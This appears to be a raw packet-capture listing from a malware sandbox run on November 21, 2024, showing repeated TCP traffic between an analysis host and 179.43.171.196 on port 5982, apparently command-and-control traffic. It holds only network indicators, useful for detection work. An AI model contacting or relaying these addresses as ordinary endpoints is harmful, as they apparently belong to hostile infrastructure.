                                                                                                                                                              Nov 21, 2024 11:27:23.746896982 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:23.746993065 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:23.747092962 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:23.867538929 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.048948050 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.048981905 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.049031973 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:25.060914993 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:25.180334091 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.475290060 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.477215052 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:25.597489119 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.893578053 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:25.896456003 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:26.016197920 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:26.016922951 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:26.137276888 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:26.448061943 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:26.450794935 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:26.572515011 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:26.572694063 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:26.692384005 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.004303932 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.004350901 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.004415989 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.038630962 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.038723946 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.038799047 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.047475100 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.159903049 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.159997940 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160027981 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160063028 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160090923 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160111904 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.160113096 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.160145044 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160173893 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.160173893 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160232067 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.160274029 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160307884 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.160367966 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.169284105 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.169331074 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.169348955 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.169377089 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.169385910 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.169415951 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.169466972 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.280447960 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.280463934 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.280553102 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.280558109 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.280599117 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.280638933 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.280699015 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.280740023 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.280847073 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.280877113 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.280899048 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.280944109 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.281002045 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.281033993 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.281086922 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.289102077 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.298434019 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.326888084 CET49736443192.168.2.9172.64.41.3
                                                                                                                                                              Nov 21, 2024 11:27:27.326925993 CET44349736172.64.41.3192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.326994896 CET49736443192.168.2.9172.64.41.3
                                                                                                                                                              Nov 21, 2024 11:27:27.327334881 CET49737443192.168.2.9162.159.61.3
                                                                                                                                                              Nov 21, 2024 11:27:27.327368975 CET44349737162.159.61.3192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.327418089 CET49737443192.168.2.9162.159.61.3
                                                                                                                                                              Nov 21, 2024 11:27:27.327689886 CET49736443192.168.2.9172.64.41.3
                                                                                                                                                              Nov 21, 2024 11:27:27.327703953 CET44349736172.64.41.3192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.327815056 CET49737443192.168.2.9162.159.61.3
                                                                                                                                                              Nov 21, 2024 11:27:27.327831984 CET44349737162.159.61.3192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401503086 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401540995 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401571035 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401606083 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401678085 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401706934 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.401804924 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.402004004 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.402035952 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.402064085 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.625348091 CET49737443192.168.2.9162.159.61.3
                                                                                                                                                              Nov 21, 2024 11:27:27.665549040 CET49736443192.168.2.9172.64.41.3
                                                                                                                                                              Nov 21, 2024 11:27:27.853343964 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.880400896 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.880515099 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.880856037 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:27.999964952 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000041008 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:28.000149012 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000186920 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000217915 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000268936 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000407934 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000461102 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000562906 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.000598907 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.119879007 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.532931089 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.536443949 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:28.536533117 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:28.536602020 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:28.536741972 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:28.536763906 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:28.656502962 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656702995 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656713963 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656723976 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656733990 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656743050 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656831026 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656881094 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656889915 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656909943 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656982899 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.656994104 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.657139063 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.657161951 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.657217026 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:28.967474937 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:29.011188030 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:29.964420080 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:30.150887012 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:30.150970936 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:30.271365881 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:30.563663960 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:30.563854933 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:30.563956022 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:30.564009905 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:30.568346977 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:30.568376064 CET497335982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:30.688416958 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:30.688749075 CET598249733179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:35.563978910 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:35.683742046 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:35.683886051 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:35.683974028 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:35.803973913 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:36.409652948 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:36.410898924 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:27:36.533663034 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:36.966964960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:36.967031002 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:36.967078924 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:36.976203918 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:37.095855951 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:37.391475916 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:37.391738892 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:37.511307001 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:37.807265997 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:37.809811115 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:37.932796001 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:37.932859898 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.053468943 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.368061066 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.371697903 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.491194010 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.491282940 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.610938072 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.923063040 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.930568933 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.930618048 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.930674076 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.930692911 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.930731058 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.930749893 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.938975096 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.939053059 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.939071894 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.946614027 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.946671963 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.946703911 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.954912901 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.954981089 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.955008030 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.959830999 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.959883928 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.960000992 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.968231916 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:38.968286991 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:38.968323946 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.016788960 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.122673035 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.122818947 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.122941971 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.126768112 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.126893044 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.126959085 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.134963036 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.138242960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.138309002 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.138358116 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.146296024 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.146363974 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.146389008 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.154548883 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.154582024 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.154635906 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.162749052 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.162844896 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.162880898 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.171061993 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.171148062 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.171169996 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.179322004 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.179385900 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.179415941 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.187695026 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.187747002 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.187787056 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.195823908 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.195939064 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.195949078 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.204135895 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.204164982 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.204229116 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.212466002 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.212528944 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.212543011 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.221143961 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.221215010 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.314850092 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.314960003 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.315016985 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.317157984 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.317239046 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.317293882 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.325520039 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.325601101 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.325648069 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.335871935 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.336066961 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.336126089 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.343266964 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.343348026 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.343389988 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.350312948 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.350353003 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.350404978 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.356297016 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.356364012 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.356424093 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.363107920 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.363132954 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.363218069 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.369816065 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.369961023 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.370018959 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.376665115 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.376725912 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.376775026 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.383430958 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.383543015 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.383588076 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.390300035 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.390398026 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.390450954 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.397243977 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.397419930 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.397474051 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.403812885 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.403834105 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.403882027 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.410717964 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.410835028 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.410883904 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.417534113 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.417553902 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.417603970 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.424186945 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.424279928 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.424320936 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.430974960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.431087017 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.431128979 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.437998056 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.438137054 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.438184977 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.444618940 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.444780111 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.444825888 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.451587915 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.451610088 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.451693058 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.458385944 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.458404064 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.458481073 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.464940071 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.465049028 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.465109110 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.471750975 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.471831083 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.471889973 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.478663921 CET598249739179.43.171.196192.168.2.9
